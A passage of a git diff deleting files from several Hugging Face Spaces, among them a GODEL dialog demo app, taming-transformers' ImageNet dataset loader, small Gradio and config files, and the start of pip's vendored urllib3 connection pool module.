- """ - - self.weight_gamma.data.fill_(-1) - local_missing_keys = [] - super()._load_from_state_dict(state_dict, prefix, local_metadata, - strict, local_missing_keys, - unexpected_keys, error_msgs) - if self.weight_gamma.data.mean() > 0: - for k in local_missing_keys: - missing_keys.append(k) - return - weight = self.weight.data - weight_flat = weight.view(weight.size(0), -1) - mean = weight_flat.mean(dim=1).view(-1, 1, 1, 1) - std = torch.sqrt(weight_flat.var(dim=1) + 1e-5).view(-1, 1, 1, 1) - self.weight_beta.data.copy_(mean) - self.weight_gamma.data.copy_(std) - missing_gamma_beta = [ - k for k in local_missing_keys - if k.endswith('weight_gamma') or k.endswith('weight_beta') - ] - for k in missing_gamma_beta: - local_missing_keys.remove(k) - for k in local_missing_keys: - missing_keys.append(k) diff --git a/spaces/PSLD/PSLD/stable-diffusion/run/inverse_gb_ldm.sh b/spaces/PSLD/PSLD/stable-diffusion/run/inverse_gb_ldm.sh deleted file mode 100644 index deba2da6d9d1eff398d87639459abd9add1b436c..0000000000000000000000000000000000000000 --- a/spaces/PSLD/PSLD/stable-diffusion/run/inverse_gb_ldm.sh +++ /dev/null @@ -1,14 +0,0 @@ -export CUDA_VISIBLE_DEVICES='1' -python scripts/inverse.py \ - --file_id='00014.png' \ - --task_config='configs/gaussian_deblur_config.yaml' \ - --inpainting=0 \ - --general_inverse=1 \ - --gamma=1e-1 \ - --omega=1e-1 \ - --ffhq256 \ - --W=256 \ - --H=256 \ - --C=3 \ - --f=4 \ - --outdir='outputs/psld-ldm-samples-gb' \ No newline at end of file diff --git a/spaces/PeepDaSlan9/AutoGPT/autogpt/permanent_memory/__init__.py b/spaces/PeepDaSlan9/AutoGPT/autogpt/permanent_memory/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/PickleYard/stable-diffusion-webui-cpu/README.md b/spaces/PickleYard/stable-diffusion-webui-cpu/README.md deleted file mode 100644 index 404430459e1b516be671298c7de21de7a039e30d..0000000000000000000000000000000000000000 --- a/spaces/PickleYard/stable-diffusion-webui-cpu/README.md +++ /dev/null @@ -1,14 +0,0 @@ ---- -title: Stable Diffusion Webui on Cpu -emoji: 🏃 -colorFrom: pink -colorTo: purple -sdk: gradio -sdk_version: 3.29.0 -app_file: app.py -pinned: false -python_version: 3.10.6 -duplicated_from: IoMa/stable-diffusion-webui-cpu-the-best ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/Pie31415/control-animation/annotator/uniformer/mmcv/__init__.py b/spaces/Pie31415/control-animation/annotator/uniformer/mmcv/__init__.py deleted file mode 100644 index 210a2989138380559f23045b568d0fbbeb918c03..0000000000000000000000000000000000000000 --- a/spaces/Pie31415/control-animation/annotator/uniformer/mmcv/__init__.py +++ /dev/null @@ -1,15 +0,0 @@ -# Copyright (c) OpenMMLab. All rights reserved. -# flake8: noqa -from .arraymisc import * -from .fileio import * -from .image import * -from .utils import * -from .version import * -from .video import * -from .visualization import * - -# The following modules are not imported to this level, so mmcv may be used -# without PyTorch. 
-# - runner -# - parallel -# - op diff --git a/spaces/Polyhronis/codellama-CodeLlama-34b-Instruct-hf/app.py b/spaces/Polyhronis/codellama-CodeLlama-34b-Instruct-hf/app.py deleted file mode 100644 index 45be891f295ef47f7654445e26536527e0f82446..0000000000000000000000000000000000000000 --- a/spaces/Polyhronis/codellama-CodeLlama-34b-Instruct-hf/app.py +++ /dev/null @@ -1,3 +0,0 @@ -import gradio as gr - -gr.Interface.load("models/codellama/CodeLlama-34b-Instruct-hf").launch() \ No newline at end of file diff --git a/spaces/PrajwalS/GODEL-Demo-nxt/app.py b/spaces/PrajwalS/GODEL-Demo-nxt/app.py deleted file mode 100644 index c9d1ac92af2fd0ce499038b47029af55d85d0793..0000000000000000000000000000000000000000 --- a/spaces/PrajwalS/GODEL-Demo-nxt/app.py +++ /dev/null @@ -1,135 +0,0 @@ -import gradio as gr - -from transformers import ( - AutoTokenizer, - AutoModel, - AutoModelForSeq2SeqLM, - AutoModelForCausalLM -) - -tokenizer = AutoTokenizer.from_pretrained("microsoft/GODEL-v1_1-base-seq2seq") -model = AutoModelForSeq2SeqLM.from_pretrained("microsoft/GODEL-v1_1-base-seq2seq") - -preset_examples = [ - ('Instruction: given a dialog context, you need to response empathically.', - '', 'Does money buy happiness?', 'Chitchat'), - ('Instruction: given a dialog context, you need to response empathically.', - '', 'What is the goal of life?', 'Chitchat'), - ('Instruction: given a dialog context, you need to response empathically.', - '', 'What is the most interesing thing about our universe?', 'Chitchat'), - ('Instruction: given a dialog context and related knowledge, you need to answer the question based on the knowledge.', - '''Scooby-Doo is the eponymous character and protagonist of the animated television franchise of the same name, created in 1969 by the American animation company Hanna-Barbera.[1] He is a male Great Dane and lifelong companion of amateur detective Shaggy Rogers, with whom he shares many personality traits. He features a mix of both canine and human behaviors (reminiscent of other talking animals in Hanna-Barbera's series), and is treated by his friends more or less as an equal. Scooby often speaks in a rhotacized way, substituting the first letters of many words with the letter 'r'. His catchphrase is "Scooby-Dooby-Doo!" - ''', - 'What kind of animal is scooby from scooby doo?', 'Conversational Question Answering' - ), - ('Instruction: given a dialog context and related knowledge, you need to answer the question based on the knowledge.', - '''Subject: faa demos - Dan: PM Team, Attached are some general ideas and issues around developing new demos for our new target markets. Please review and provide feedback. Also, please provide links where we can learn more about various FAA applications. Thanx, Dan. - Alex: Dan, Thanks for putting the high level descriptions together. My questions are: *Is it practical to do an EAI demo given the inherent complexity of application integration? ... * Should we delay looking at Outlook for now?... *What do you think that timelines are developing these demos? ... Alex - Dan: Alex, Thanks for the feedback, please see my comments below: - ''', - 'what does Dan ask PM team to do?', 'Conversational Question Answering' - ), - ('Instruction: given a dialog context and related knowledge, you need to answer the question based on the knowledge.', - '''Carlos Alcaraz, at just 19, completed an improbable journey on Sunday in Flushing Meadows as he defeated No. 5 Casper Ruud to win the 2022 US Open. 
Alcaraz came away with a 6-4, 2-6, 7-6, 6-2 win over Ruud to win his first career Grand Slam title. - - In doing so, Alcaraz became the second-youngest player to win a men's US Open title at 19 years, 129 days old, only trailing Pete Sampras. In addition, Alcaraz is the seventh youngest male or female to ever win a Grand Slam tournament. With the Grand Slam victory, Alcaraz becomes the No. 1 ranked player in the world. Additionally, the 19-year-old budding star is also the youngest player to ever be ranked as the world's No. 1 player. - ''', - 'who won the 2022 US Open? EOS Carlos Alcaraz EOS how old?', 'Conversational Question Answering' - ), - ( - 'Instruction: given a dialog context and related knowledge, you need to response safely based on the knowledge.', - '''Over-the-counter medications such as ibuprofen (Advil, Motrin IB, others), acetaminophen (Tylenol, others) and aspirin. - ''', - 'I have a headache, what should I do?', "Grounded Response Generation" - ), - ( - 'Instruction: given a dialog context and related knowledge, you need to response safely based on the knowledge.', - '''The best Stardew Valley mods PCGamesN_0 / About SMAPI - ''', - 'My favorite game is stardew valley. stardew valley is very fun.', "Grounded Response Generation" - ), - ( - 'Instruction: given a dialog context and related knowledge, you need to response safely based on the knowledge.', - '''Wong Kar-wai BBS (born 17 July 1958) is a Hong Kong film director, screenwriter, and producer. His films are characterised by nonlinear narratives, atmospheric music, and vivid cinematography involving bold, saturated colours. A pivotal figure of Hong Kong cinema, Wong is considered a contemporary auteur, and ranks third on Sight & Sound's 2002 poll of the greatest filmmakers of modern times.[note 1] His films frequently appear on best-of lists domestically and internationally. - ''', - 'My favorite director is wrong kar wai. 
i think in modern cinema there is no other director is is making the medium as cool', "Grounded Response Generation" - ) -] - - -def generate(instruction, knowledge, dialog, top_p, min_length, max_length): - if knowledge != '': - knowledge = '[KNOWLEDGE] ' + knowledge - dialog = ' EOS '.join(dialog) - query = f"{instruction} [CONTEXT] {dialog} {knowledge}" - - input_ids = tokenizer(f"{query}", return_tensors="pt").input_ids - outputs = model.generate(input_ids, min_length=int( - min_length), max_length=int(max_length), top_p=top_p, do_sample=True) - output = tokenizer.decode(outputs[0], skip_special_tokens=True) - print(query) - print(output) - return output - - -def api_call_generation(instruction, knowledge, query, top_p, min_length, max_length): - - dialog = [ - query - ] - response = generate(instruction, knowledge, dialog, - top_p, min_length, max_length) - - return response - - -def change_example(choice): - choice_idx = int(choice.split()[-1]) - 1 - instruction, knowledge, query, instruction_type = preset_examples[choice_idx] - return [gr.update(lines=1, visible=True, value=instruction), gr.update(visible=True, value=knowledge), gr.update(lines=1, visible=True, value=query), gr.update(visible=True, value=instruction_type)] - -def change_textbox(choice): - if choice == "Chitchat": - return gr.update(lines=1, visible=True, value="Instruction: given a dialog context, you need to response empathically.") - elif choice == "Grounded Response Generation": - return gr.update(lines=1, visible=True, value="Instruction: given a dialog context and related knowledge, you need to response safely based on the knowledge.") - else: - return gr.update(lines=1, visible=True, value="Instruction: given a dialog context and related knowledge, you need to answer the question based on the knowledge.") - - -with gr.Blocks() as demo: - gr.Markdown("# GODEL: Large-Scale Pre-Training for Goal-Directed Dialog") - gr.Markdown('''GODEL is a large open-source pre-trained language model for dialog. In contrast with its predecessor DialoGPT, GODEL leverages a new phase of grounded pretraining designed to better support finetuning phases that require information external to the current conversation (e.g., a database or document) to produce good responses. More information about this work can be found in the paper [GODEL: Large-Scale Pre-training for Goal-Directed Dialog.](https://www.microsoft.com/en-us/research/project/godel/) - ->Looking for a large open-source pre-trained language model for dialog? Look no further than GODEL! GODEL leverages a new phase of grounded pretraining designed to better support finetuning phases that require information external to the current conversation (e.g., a database or document) to produce good responses. So if you're looking for a language model that can help you produce better responses in a variety of situations, GODEL is the right choice for you!

------ a copy from GPT-3

''') - - dropdown = gr.Dropdown( - [f"Example {i+1}" for i in range(9)], label='Examples') - - radio = gr.Radio( - ["Conversational Question Answering", "Chitchat", "Grounded Response Generation"], label="Instruction Type", value='Conversational Question Answering' - ) - instruction = gr.Textbox(lines=1, interactive=True, label="Instruction", - value="Instruction: given a dialog context and related knowledge, you need to answer the question based on the knowledge.") - radio.change(fn=change_textbox, inputs=radio, outputs=instruction) - knowledge = gr.Textbox(lines=6, label="Knowledge") - query = gr.Textbox(lines=1, label="User Query") - - dropdown.change(change_example, dropdown, [instruction, knowledge, query, radio]) - - with gr.Row(): - with gr.Column(scale=1): - response = gr.Textbox(label="Response", lines=2) - - with gr.Column(scale=1): - top_p = gr.Slider(0, 1, value=0.9, label='top_p') - min_length = gr.Number(8, label='min_length') - max_length = gr.Number( - 64, label='max_length (should be larger than min_length)') - - greet_btn = gr.Button("Generate") - greet_btn.click(fn=api_call_generation, inputs=[ - instruction, knowledge, query, top_p, min_length, max_length], outputs=response) - -demo.launch() diff --git a/spaces/Purple11/Grounded-Diffusion/src/taming-transformers/taming/data/imagenet.py b/spaces/Purple11/Grounded-Diffusion/src/taming-transformers/taming/data/imagenet.py deleted file mode 100644 index 9a02ec44ba4af9e993f58c91fa43482a4ecbe54c..0000000000000000000000000000000000000000 --- a/spaces/Purple11/Grounded-Diffusion/src/taming-transformers/taming/data/imagenet.py +++ /dev/null @@ -1,558 +0,0 @@ -import os, tarfile, glob, shutil -import yaml -import numpy as np -from tqdm import tqdm -from PIL import Image -import albumentations -from omegaconf import OmegaConf -from torch.utils.data import Dataset - -from taming.data.base import ImagePaths -from taming.util import download, retrieve -import taming.data.utils as bdu - - -def give_synsets_from_indices(indices, path_to_yaml="data/imagenet_idx_to_synset.yaml"): - synsets = [] - with open(path_to_yaml) as f: - di2s = yaml.load(f) - for idx in indices: - synsets.append(str(di2s[idx])) - print("Using {} different synsets for construction of Restriced Imagenet.".format(len(synsets))) - return synsets - - -def str_to_indices(string): - """Expects a string in the format '32-123, 256, 280-321'""" - assert not string.endswith(","), "provided string '{}' ends with a comma, pls remove it".format(string) - subs = string.split(",") - indices = [] - for sub in subs: - subsubs = sub.split("-") - assert len(subsubs) > 0 - if len(subsubs) == 1: - indices.append(int(subsubs[0])) - else: - rang = [j for j in range(int(subsubs[0]), int(subsubs[1]))] - indices.extend(rang) - return sorted(indices) - - -class ImageNetBase(Dataset): - def __init__(self, config=None): - self.config = config or OmegaConf.create() - if not type(self.config)==dict: - self.config = OmegaConf.to_container(self.config) - self._prepare() - self._prepare_synset_to_human() - self._prepare_idx_to_synset() - self._load() - - def __len__(self): - return len(self.data) - - def __getitem__(self, i): - return self.data[i] - - def _prepare(self): - raise NotImplementedError() - - def _filter_relpaths(self, relpaths): - ignore = set([ - "n06596364_9591.JPEG", - ]) - relpaths = [rpath for rpath in relpaths if not rpath.split("/")[-1] in ignore] - if "sub_indices" in self.config: - indices = str_to_indices(self.config["sub_indices"]) - synsets = 
give_synsets_from_indices(indices, path_to_yaml=self.idx2syn) # returns a list of strings - files = [] - for rpath in relpaths: - syn = rpath.split("/")[0] - if syn in synsets: - files.append(rpath) - return files - else: - return relpaths - - def _prepare_synset_to_human(self): - SIZE = 2655750 - URL = "https://heibox.uni-heidelberg.de/f/9f28e956cd304264bb82/?dl=1" - self.human_dict = os.path.join(self.root, "synset_human.txt") - if (not os.path.exists(self.human_dict) or - not os.path.getsize(self.human_dict)==SIZE): - download(URL, self.human_dict) - - def _prepare_idx_to_synset(self): - URL = "https://heibox.uni-heidelberg.de/f/d835d5b6ceda4d3aa910/?dl=1" - self.idx2syn = os.path.join(self.root, "index_synset.yaml") - if (not os.path.exists(self.idx2syn)): - download(URL, self.idx2syn) - - def _load(self): - with open(self.txt_filelist, "r") as f: - self.relpaths = f.read().splitlines() - l1 = len(self.relpaths) - self.relpaths = self._filter_relpaths(self.relpaths) - print("Removed {} files from filelist during filtering.".format(l1 - len(self.relpaths))) - - self.synsets = [p.split("/")[0] for p in self.relpaths] - self.abspaths = [os.path.join(self.datadir, p) for p in self.relpaths] - - unique_synsets = np.unique(self.synsets) - class_dict = dict((synset, i) for i, synset in enumerate(unique_synsets)) - self.class_labels = [class_dict[s] for s in self.synsets] - - with open(self.human_dict, "r") as f: - human_dict = f.read().splitlines() - human_dict = dict(line.split(maxsplit=1) for line in human_dict) - - self.human_labels = [human_dict[s] for s in self.synsets] - - labels = { - "relpath": np.array(self.relpaths), - "synsets": np.array(self.synsets), - "class_label": np.array(self.class_labels), - "human_label": np.array(self.human_labels), - } - self.data = ImagePaths(self.abspaths, - labels=labels, - size=retrieve(self.config, "size", default=0), - random_crop=self.random_crop) - - -class ImageNetTrain(ImageNetBase): - NAME = "ILSVRC2012_train" - URL = "http://www.image-net.org/challenges/LSVRC/2012/" - AT_HASH = "a306397ccf9c2ead27155983c254227c0fd938e2" - FILES = [ - "ILSVRC2012_img_train.tar", - ] - SIZES = [ - 147897477120, - ] - - def _prepare(self): - self.random_crop = retrieve(self.config, "ImageNetTrain/random_crop", - default=True) - cachedir = os.environ.get("XDG_CACHE_HOME", os.path.expanduser("~/.cache")) - self.root = os.path.join(cachedir, "autoencoders/data", self.NAME) - self.datadir = os.path.join(self.root, "data") - self.txt_filelist = os.path.join(self.root, "filelist.txt") - self.expected_length = 1281167 - if not bdu.is_prepared(self.root): - # prep - print("Preparing dataset {} in {}".format(self.NAME, self.root)) - - datadir = self.datadir - if not os.path.exists(datadir): - path = os.path.join(self.root, self.FILES[0]) - if not os.path.exists(path) or not os.path.getsize(path)==self.SIZES[0]: - import academictorrents as at - atpath = at.get(self.AT_HASH, datastore=self.root) - assert atpath == path - - print("Extracting {} to {}".format(path, datadir)) - os.makedirs(datadir, exist_ok=True) - with tarfile.open(path, "r:") as tar: - tar.extractall(path=datadir) - - print("Extracting sub-tars.") - subpaths = sorted(glob.glob(os.path.join(datadir, "*.tar"))) - for subpath in tqdm(subpaths): - subdir = subpath[:-len(".tar")] - os.makedirs(subdir, exist_ok=True) - with tarfile.open(subpath, "r:") as tar: - tar.extractall(path=subdir) - - - filelist = glob.glob(os.path.join(datadir, "**", "*.JPEG")) - filelist = [os.path.relpath(p, start=datadir) for p in 
filelist] - filelist = sorted(filelist) - filelist = "\n".join(filelist)+"\n" - with open(self.txt_filelist, "w") as f: - f.write(filelist) - - bdu.mark_prepared(self.root) - - -class ImageNetValidation(ImageNetBase): - NAME = "ILSVRC2012_validation" - URL = "http://www.image-net.org/challenges/LSVRC/2012/" - AT_HASH = "5d6d0df7ed81efd49ca99ea4737e0ae5e3a5f2e5" - VS_URL = "https://heibox.uni-heidelberg.de/f/3e0f6e9c624e45f2bd73/?dl=1" - FILES = [ - "ILSVRC2012_img_val.tar", - "validation_synset.txt", - ] - SIZES = [ - 6744924160, - 1950000, - ] - - def _prepare(self): - self.random_crop = retrieve(self.config, "ImageNetValidation/random_crop", - default=False) - cachedir = os.environ.get("XDG_CACHE_HOME", os.path.expanduser("~/.cache")) - self.root = os.path.join(cachedir, "autoencoders/data", self.NAME) - self.datadir = os.path.join(self.root, "data") - self.txt_filelist = os.path.join(self.root, "filelist.txt") - self.expected_length = 50000 - if not bdu.is_prepared(self.root): - # prep - print("Preparing dataset {} in {}".format(self.NAME, self.root)) - - datadir = self.datadir - if not os.path.exists(datadir): - path = os.path.join(self.root, self.FILES[0]) - if not os.path.exists(path) or not os.path.getsize(path)==self.SIZES[0]: - import academictorrents as at - atpath = at.get(self.AT_HASH, datastore=self.root) - assert atpath == path - - print("Extracting {} to {}".format(path, datadir)) - os.makedirs(datadir, exist_ok=True) - with tarfile.open(path, "r:") as tar: - tar.extractall(path=datadir) - - vspath = os.path.join(self.root, self.FILES[1]) - if not os.path.exists(vspath) or not os.path.getsize(vspath)==self.SIZES[1]: - download(self.VS_URL, vspath) - - with open(vspath, "r") as f: - synset_dict = f.read().splitlines() - synset_dict = dict(line.split() for line in synset_dict) - - print("Reorganizing into synset folders") - synsets = np.unique(list(synset_dict.values())) - for s in synsets: - os.makedirs(os.path.join(datadir, s), exist_ok=True) - for k, v in synset_dict.items(): - src = os.path.join(datadir, k) - dst = os.path.join(datadir, v) - shutil.move(src, dst) - - filelist = glob.glob(os.path.join(datadir, "**", "*.JPEG")) - filelist = [os.path.relpath(p, start=datadir) for p in filelist] - filelist = sorted(filelist) - filelist = "\n".join(filelist)+"\n" - with open(self.txt_filelist, "w") as f: - f.write(filelist) - - bdu.mark_prepared(self.root) - - -def get_preprocessor(size=None, random_crop=False, additional_targets=None, - crop_size=None): - if size is not None and size > 0: - transforms = list() - rescaler = albumentations.SmallestMaxSize(max_size = size) - transforms.append(rescaler) - if not random_crop: - cropper = albumentations.CenterCrop(height=size,width=size) - transforms.append(cropper) - else: - cropper = albumentations.RandomCrop(height=size,width=size) - transforms.append(cropper) - flipper = albumentations.HorizontalFlip() - transforms.append(flipper) - preprocessor = albumentations.Compose(transforms, - additional_targets=additional_targets) - elif crop_size is not None and crop_size > 0: - if not random_crop: - cropper = albumentations.CenterCrop(height=crop_size,width=crop_size) - else: - cropper = albumentations.RandomCrop(height=crop_size,width=crop_size) - transforms = [cropper] - preprocessor = albumentations.Compose(transforms, - additional_targets=additional_targets) - else: - preprocessor = lambda **kwargs: kwargs - return preprocessor - - -def rgba_to_depth(x): - assert x.dtype == np.uint8 - assert len(x.shape) == 3 and x.shape[2] == 4 - 
y = x.copy() - y.dtype = np.float32 - y = y.reshape(x.shape[:2]) - return np.ascontiguousarray(y) - - -class BaseWithDepth(Dataset): - DEFAULT_DEPTH_ROOT="data/imagenet_depth" - - def __init__(self, config=None, size=None, random_crop=False, - crop_size=None, root=None): - self.config = config - self.base_dset = self.get_base_dset() - self.preprocessor = get_preprocessor( - size=size, - crop_size=crop_size, - random_crop=random_crop, - additional_targets={"depth": "image"}) - self.crop_size = crop_size - if self.crop_size is not None: - self.rescaler = albumentations.Compose( - [albumentations.SmallestMaxSize(max_size = self.crop_size)], - additional_targets={"depth": "image"}) - if root is not None: - self.DEFAULT_DEPTH_ROOT = root - - def __len__(self): - return len(self.base_dset) - - def preprocess_depth(self, path): - rgba = np.array(Image.open(path)) - depth = rgba_to_depth(rgba) - depth = (depth - depth.min())/max(1e-8, depth.max()-depth.min()) - depth = 2.0*depth-1.0 - return depth - - def __getitem__(self, i): - e = self.base_dset[i] - e["depth"] = self.preprocess_depth(self.get_depth_path(e)) - # up if necessary - h,w,c = e["image"].shape - if self.crop_size and min(h,w) < self.crop_size: - # have to upscale to be able to crop - this just uses bilinear - out = self.rescaler(image=e["image"], depth=e["depth"]) - e["image"] = out["image"] - e["depth"] = out["depth"] - transformed = self.preprocessor(image=e["image"], depth=e["depth"]) - e["image"] = transformed["image"] - e["depth"] = transformed["depth"] - return e - - -class ImageNetTrainWithDepth(BaseWithDepth): - # default to random_crop=True - def __init__(self, random_crop=True, sub_indices=None, **kwargs): - self.sub_indices = sub_indices - super().__init__(random_crop=random_crop, **kwargs) - - def get_base_dset(self): - if self.sub_indices is None: - return ImageNetTrain() - else: - return ImageNetTrain({"sub_indices": self.sub_indices}) - - def get_depth_path(self, e): - fid = os.path.splitext(e["relpath"])[0]+".png" - fid = os.path.join(self.DEFAULT_DEPTH_ROOT, "train", fid) - return fid - - -class ImageNetValidationWithDepth(BaseWithDepth): - def __init__(self, sub_indices=None, **kwargs): - self.sub_indices = sub_indices - super().__init__(**kwargs) - - def get_base_dset(self): - if self.sub_indices is None: - return ImageNetValidation() - else: - return ImageNetValidation({"sub_indices": self.sub_indices}) - - def get_depth_path(self, e): - fid = os.path.splitext(e["relpath"])[0]+".png" - fid = os.path.join(self.DEFAULT_DEPTH_ROOT, "val", fid) - return fid - - -class RINTrainWithDepth(ImageNetTrainWithDepth): - def __init__(self, config=None, size=None, random_crop=True, crop_size=None): - sub_indices = "30-32, 33-37, 151-268, 281-285, 80-100, 365-382, 389-397, 118-121, 300-319" - super().__init__(config=config, size=size, random_crop=random_crop, - sub_indices=sub_indices, crop_size=crop_size) - - -class RINValidationWithDepth(ImageNetValidationWithDepth): - def __init__(self, config=None, size=None, random_crop=False, crop_size=None): - sub_indices = "30-32, 33-37, 151-268, 281-285, 80-100, 365-382, 389-397, 118-121, 300-319" - super().__init__(config=config, size=size, random_crop=random_crop, - sub_indices=sub_indices, crop_size=crop_size) - - -class DRINExamples(Dataset): - def __init__(self): - self.preprocessor = get_preprocessor(size=256, additional_targets={"depth": "image"}) - with open("data/drin_examples.txt", "r") as f: - relpaths = f.read().splitlines() - self.image_paths = 
[os.path.join("data/drin_images", - relpath) for relpath in relpaths] - self.depth_paths = [os.path.join("data/drin_depth", - relpath.replace(".JPEG", ".png")) for relpath in relpaths] - - def __len__(self): - return len(self.image_paths) - - def preprocess_image(self, image_path): - image = Image.open(image_path) - if not image.mode == "RGB": - image = image.convert("RGB") - image = np.array(image).astype(np.uint8) - image = self.preprocessor(image=image)["image"] - image = (image/127.5 - 1.0).astype(np.float32) - return image - - def preprocess_depth(self, path): - rgba = np.array(Image.open(path)) - depth = rgba_to_depth(rgba) - depth = (depth - depth.min())/max(1e-8, depth.max()-depth.min()) - depth = 2.0*depth-1.0 - return depth - - def __getitem__(self, i): - e = dict() - e["image"] = self.preprocess_image(self.image_paths[i]) - e["depth"] = self.preprocess_depth(self.depth_paths[i]) - transformed = self.preprocessor(image=e["image"], depth=e["depth"]) - e["image"] = transformed["image"] - e["depth"] = transformed["depth"] - return e - - -def imscale(x, factor, keepshapes=False, keepmode="bicubic"): - if factor is None or factor==1: - return x - - dtype = x.dtype - assert dtype in [np.float32, np.float64] - assert x.min() >= -1 - assert x.max() <= 1 - - keepmode = {"nearest": Image.NEAREST, "bilinear": Image.BILINEAR, - "bicubic": Image.BICUBIC}[keepmode] - - lr = (x+1.0)*127.5 - lr = lr.clip(0,255).astype(np.uint8) - lr = Image.fromarray(lr) - - h, w, _ = x.shape - nh = h//factor - nw = w//factor - assert nh > 0 and nw > 0, (nh, nw) - - lr = lr.resize((nw,nh), Image.BICUBIC) - if keepshapes: - lr = lr.resize((w,h), keepmode) - lr = np.array(lr)/127.5-1.0 - lr = lr.astype(dtype) - - return lr - - -class ImageNetScale(Dataset): - def __init__(self, size=None, crop_size=None, random_crop=False, - up_factor=None, hr_factor=None, keep_mode="bicubic"): - self.base = self.get_base() - - self.size = size - self.crop_size = crop_size if crop_size is not None else self.size - self.random_crop = random_crop - self.up_factor = up_factor - self.hr_factor = hr_factor - self.keep_mode = keep_mode - - transforms = list() - - if self.size is not None and self.size > 0: - rescaler = albumentations.SmallestMaxSize(max_size = self.size) - self.rescaler = rescaler - transforms.append(rescaler) - - if self.crop_size is not None and self.crop_size > 0: - if len(transforms) == 0: - self.rescaler = albumentations.SmallestMaxSize(max_size = self.crop_size) - - if not self.random_crop: - cropper = albumentations.CenterCrop(height=self.crop_size,width=self.crop_size) - else: - cropper = albumentations.RandomCrop(height=self.crop_size,width=self.crop_size) - transforms.append(cropper) - - if len(transforms) > 0: - if self.up_factor is not None: - additional_targets = {"lr": "image"} - else: - additional_targets = None - self.preprocessor = albumentations.Compose(transforms, - additional_targets=additional_targets) - else: - self.preprocessor = lambda **kwargs: kwargs - - def __len__(self): - return len(self.base) - - def __getitem__(self, i): - example = self.base[i] - image = example["image"] - # adjust resolution - image = imscale(image, self.hr_factor, keepshapes=False) - h,w,c = image.shape - if self.crop_size and min(h,w) < self.crop_size: - # have to upscale to be able to crop - this just uses bilinear - image = self.rescaler(image=image)["image"] - if self.up_factor is None: - image = self.preprocessor(image=image)["image"] - example["image"] = image - else: - lr = imscale(image, self.up_factor, 
keepshapes=True, - keepmode=self.keep_mode) - - out = self.preprocessor(image=image, lr=lr) - example["image"] = out["image"] - example["lr"] = out["lr"] - - return example - -class ImageNetScaleTrain(ImageNetScale): - def __init__(self, random_crop=True, **kwargs): - super().__init__(random_crop=random_crop, **kwargs) - - def get_base(self): - return ImageNetTrain() - -class ImageNetScaleValidation(ImageNetScale): - def get_base(self): - return ImageNetValidation() - - -from skimage.feature import canny -from skimage.color import rgb2gray - - -class ImageNetEdges(ImageNetScale): - def __init__(self, up_factor=1, **kwargs): - super().__init__(up_factor=1, **kwargs) - - def __getitem__(self, i): - example = self.base[i] - image = example["image"] - h,w,c = image.shape - if self.crop_size and min(h,w) < self.crop_size: - # have to upscale to be able to crop - this just uses bilinear - image = self.rescaler(image=image)["image"] - - lr = canny(rgb2gray(image), sigma=2) - lr = lr.astype(np.float32) - lr = lr[:,:,None][:,:,[0,0,0]] - - out = self.preprocessor(image=image, lr=lr) - example["image"] = out["image"] - example["lr"] = out["lr"] - - return example - - -class ImageNetEdgesTrain(ImageNetEdges): - def __init__(self, random_crop=True, **kwargs): - super().__init__(random_crop=random_crop, **kwargs) - - def get_base(self): - return ImageNetTrain() - -class ImageNetEdgesValidation(ImageNetEdges): - def get_base(self): - return ImageNetValidation() diff --git a/spaces/Raspberry-ai/main/.env/lib/python3.11/site-packages/pip/_vendor/urllib3/connectionpool.py b/spaces/Raspberry-ai/main/.env/lib/python3.11/site-packages/pip/_vendor/urllib3/connectionpool.py deleted file mode 100644 index 96339e90af17e12a86750eba73746e25f9f76271..0000000000000000000000000000000000000000 --- a/spaces/Raspberry-ai/main/.env/lib/python3.11/site-packages/pip/_vendor/urllib3/connectionpool.py +++ /dev/null @@ -1,1110 +0,0 @@ -from __future__ import absolute_import - -import errno -import logging -import re -import socket -import sys -import warnings -from socket import error as SocketError -from socket import timeout as SocketTimeout - -from .connection import ( - BaseSSLError, - BrokenPipeError, - DummyConnection, - HTTPConnection, - HTTPException, - HTTPSConnection, - VerifiedHTTPSConnection, - port_by_scheme, -) -from .exceptions import ( - ClosedPoolError, - EmptyPoolError, - HeaderParsingError, - HostChangedError, - InsecureRequestWarning, - LocationValueError, - MaxRetryError, - NewConnectionError, - ProtocolError, - ProxyError, - ReadTimeoutError, - SSLError, - TimeoutError, -) -from .packages import six -from .packages.six.moves import queue -from .request import RequestMethods -from .response import HTTPResponse -from .util.connection import is_connection_dropped -from .util.proxy import connection_requires_http_tunnel -from .util.queue import LifoQueue -from .util.request import set_file_position -from .util.response import assert_header_parsing -from .util.retry import Retry -from .util.ssl_match_hostname import CertificateError -from .util.timeout import Timeout -from .util.url import Url, _encode_target -from .util.url import _normalize_host as normalize_host -from .util.url import get_host, parse_url - -xrange = six.moves.xrange - -log = logging.getLogger(__name__) - -_Default = object() - - -# Pool objects -class ConnectionPool(object): - """ - Base class for all connection pools, such as - :class:`.HTTPConnectionPool` and :class:`.HTTPSConnectionPool`. - - .. 
note:: - ConnectionPool.urlopen() does not normalize or percent-encode target URIs - which is useful if your target server doesn't support percent-encoded - target URIs. - """ - - scheme = None - QueueCls = LifoQueue - - def __init__(self, host, port=None): - if not host: - raise LocationValueError("No host specified.") - - self.host = _normalize_host(host, scheme=self.scheme) - self._proxy_host = host.lower() - self.port = port - - def __str__(self): - return "%s(host=%r, port=%r)" % (type(self).__name__, self.host, self.port) - - def __enter__(self): - return self - - def __exit__(self, exc_type, exc_val, exc_tb): - self.close() - # Return False to re-raise any potential exceptions - return False - - def close(self): - """ - Close all pooled connections and disable the pool. - """ - pass - - -# This is taken from http://hg.python.org/cpython/file/7aaba721ebc0/Lib/socket.py#l252 -_blocking_errnos = {errno.EAGAIN, errno.EWOULDBLOCK} - - -class HTTPConnectionPool(ConnectionPool, RequestMethods): - """ - Thread-safe connection pool for one host. - - :param host: - Host used for this HTTP Connection (e.g. "localhost"), passed into - :class:`http.client.HTTPConnection`. - - :param port: - Port used for this HTTP Connection (None is equivalent to 80), passed - into :class:`http.client.HTTPConnection`. - - :param strict: - Causes BadStatusLine to be raised if the status line can't be parsed - as a valid HTTP/1.0 or 1.1 status line, passed into - :class:`http.client.HTTPConnection`. - - .. note:: - Only works in Python 2. This parameter is ignored in Python 3. - - :param timeout: - Socket timeout in seconds for each individual connection. This can - be a float or integer, which sets the timeout for the HTTP request, - or an instance of :class:`urllib3.util.Timeout` which gives you more - fine-grained control over request timeouts. After the constructor has - been parsed, this is always a `urllib3.util.Timeout` object. - - :param maxsize: - Number of connections to save that can be reused. More than 1 is useful - in 